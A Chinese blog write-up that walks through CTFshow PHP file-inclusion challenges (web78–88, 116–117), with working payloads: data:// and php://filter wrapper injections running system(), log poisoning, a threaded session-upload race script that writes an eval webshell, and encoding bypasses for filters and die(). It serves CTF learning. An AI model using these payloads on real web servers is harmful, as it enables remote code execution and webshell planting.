CTFSHOW文件包含

已于 2022-04-08 21:10:17 修改
阅读量4.7k 收藏 16
点赞数 1
分类专栏: CTFSHOW 文章标签: 安全 web
于 2022-04-06 21:49:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Yb_140/article/details/123672286
版权

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)

文件包含函数:

函数区别
require()在包含的过程中如果出现错误,会直接报错并退出程序的执行
include()在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
require_once()和require函数相同,但只包含一次
include_once()和include函数相同,但只包含一次

web78

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

没有任何的过滤

?file=data://text/plain,<?php system("cat flag.php");?>

data://伪协议

这里的text/plain表示的是文本

也可以text/plain;base64,若纯文字没用可用base64编码

 可以参考:CTF常用伪协议总结_Asionm的博客-优快云博客_ctf伪协议

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这里把php替换成了???

可以采用上面说到的base64编码绕过

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了php和data

这里可以进行日志包含:通过User-Agent头部注入命令:

然后将日志包含进去,并通过POST参数执行命令:

?file=/var/log/nginx/access.log

找到

a=system('cat fl0g.php');

仔细观察即可得到flag

总:

//日志包含
/?file=/var/log/nginx/access.log
//命令执行
a=system('ls');
a=system('cat fl0g.php');

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,data,:

可以和上一题一样

web82

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

在cookie处添加PHPSESSID,这样提交的话会在默认session目录下生成类似于sess_aaa的文件,默认临时目录为/tmp/sess_aaa,这个文件名字是我们可以控制的

控制里面的内容需要PHP_SESSION_UPLOAD_PRGRESS参数,是用来获取实时文件的上传进度,它会返回一个session,用来实现写入的内容

脚本:

#-- coding:UTF-8 --

import io
import requests
import threading
url = 'http://616ed007-24be-4e42-9bc8-7fcbc8bfd49c.challenge.ctf.show/'
sessionid='ctfshow'
data={
    "1":"file_put_contents('/var/www/html/1.php','<?php eval($_POST[2]);?>');"
}

def write(session):
    fileBytes=io.BytesIO(b'a' * 1024 * 50)
    while True:
        response=session.post(
            url,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'
            },
            cookies={
                'PHPSESSID':sessionid
            },
            files={
                'file':('ctfshow.jpg',fileBytes)
            }
        )
def read(session):
    while True:
        response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
                                cookies={
                                    'PHPSESSID':sessionid
                                }
                                )
        response2=session.get(url+'1.php')
        if response2.status_code==200:
            print('++++++++++++done++++++++++++')
        else:
            print(response2.status_code)

if __name__ == '__main__':
    evnet=threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read,args=(session,)).start()
    evnet.set()

web83

session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

利用session文件包含

来自:Ctfshow Web入门 - 文件包含总结 - ch0bits - 博客园

写一个POST网页

<!DOCTYPE html>
<html>
<body>
<form action="http://44a86596-324d-4eaa-8051-6e323bd0814a.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls');?>" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

创建一个1.html,写入上面的代码

搭建本地环境,进入1.html,上传的文件随意

使用bp抓包

在cookie处添加:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag

发送到爆破模块,以上为第一个包

来到题目页面,传参?file=/tmp/sess_flag,同时抓包

发送到爆破模块。为第二个包

两个同时开始发包

访问fl0g.php即可

即可得到flag

或者上题的脚本还是可以使用的

web84-86

同上

web87

题目中的die是绕过的重点

方法1

对其使用base64解码绕过

?file=php://filter/write=convert.base64-decode/resource=flag.php

 然后对content写入的内容进行base64编码

base64解码时,是4个为一组,flag.php的内容<?php die('大佬别秀了');?>中phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了

总结:我们要在content中写入shell,然后base64编码
content=<?php system('tac f*.php');?>

base64

content=PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

写入的文件内容

<?php die('大佬别秀了');?>PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

补两个a

content=aaPD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

对file进行两次url全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%36%36%25%36%43%25%36%31%25%36%37%25%32%45%25%37%30%25%36%38%25%37%30

传参

然后访问flag.php即可 

方法2

使用rot13,原理和方法一类似

对content中的所有内容进行rot13编码加密,从而绕过die

<?php system('tac f*.php');?>

使用rot13编码后

<?cuc flfgrz('gnp s*.cuc');?>
?file=php://filter/write=string.rot13/resource=1.php

 进行两次URL全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30

 传参

然后访问1.php

web88

考察过滤后进行包含

但是这里没有过滤冒号

直接使用伪协议

?file=data://text/plain;base64,<?php system('tac *.php');?>

对<?php system('tac *.php');?>进行base64编码

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

但是这里的=被过滤

可以在前面的基础上加一点东西

<?php system('tac *.php');?>aa

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

web116

?file=flag.php

抓包

web117

和87类似

这里过滤了base64和rot13

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=?<hp pvela$(P_SO[T]1;)>?

 

访问a.php,然后传参

1=system('tac flag.php');

得到flag

ctfshow——文件包含
qq_55202378的博客
02-03 1180
这里不知道的文件路径,可以考虑使用尝试执行php语句,获取文件路径。 可能读取不了文件,这时候试试。linux 命令是倒序读取文件,也就是从最后一行往前读取文件。数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。用法: 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。php伪协议总结: 首先,根据php特性,无法迭代过滤,只过滤一次。此处,如果用替换,可以直接使用双写进行绕过。 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。既
CTFshow 文件包含 web80
Kradress的博客
12-08 981
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
[ctfshow]web入门文件包含78-88
L1ni01
12-04 3090
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
攻防世界-file_include
最新发布
weixin_71036000的博客
03-11 173
发现不能使用php://,应该是过滤了base64-encode或者是php://,这是可以给base64-encode进行两次url编码进行绕过。在一开始包含了以个check.php是验证规则,来验证你传递的是不是合法的,这是可以看看能不能正常包含文件。可以发现能够正常包含,这是可以利用php://协议进行包含。这时候发现能回显,然后解码看看过滤了什么。发现过滤了base、encode。这时候直接可以读取flag。
ctfshow-文件包含
m0_72125469的博客
09-06 1466
结果是是这个原因 include包含的文件如果存在路径 他会按照指定路径查找文件 如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件 没有则在当前文件所在的目录和当前工作目录下寻找 所以不影响我们 线程5应该就可以了 不需要高并发导致的不确定行为 而是普通的和服务器删除速度来竞争 不是高并发的竞争。这里说一下 提交请求后的请求体是 不是想象的那种post 键值对的形式 而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中 这块的简单知识点 有时间得看看。
ctfshow 文件包含
qq_74806534的博客
03-23 728
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
CTFSHOW-文件包含
m0_74606212的博客
03-24 550
CTFSHOW-文件包含
ctfshow文件包含
02-16
### CTFShow 文件包含漏洞挑战解决方案 在处理CTFShow平台中的文件包含漏洞时,理解该类漏洞的工作原理至关重要。文件包含漏洞允许攻击者通过操纵输入参数来读取或执行服务器上的任意文件。 对于具体的`PKTFMT_...
CTFshow 文件包含 web116
Kradress的博客
12-12 891
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
CTFshow 文件包含 web87
Kradress的博客
12-12 2030
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
CTFSHOW 文件包含
CyhDl666的博客
03-27 255
今天 复习一下文件包含漏洞 web 78 payload: ?file=php://filter/convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 这道题开始就有技巧了 源码 过滤了 php和data 伪协议用不了 if(isset($_GET['file'])){ .
CTFshow-文件包含
qq_61376069的博客
01-19 317
CTFshow入门——文件包含
CTFshow 文件包含
Je3Z的博客
06-03 493
web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一:远程文件包含 往VPS下面写马,然后远程包含: ?file=http://118.***.***.***/1.txt 方法二:日志文件包含 ?file=/var/log/nginx/access.log 因此往U
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值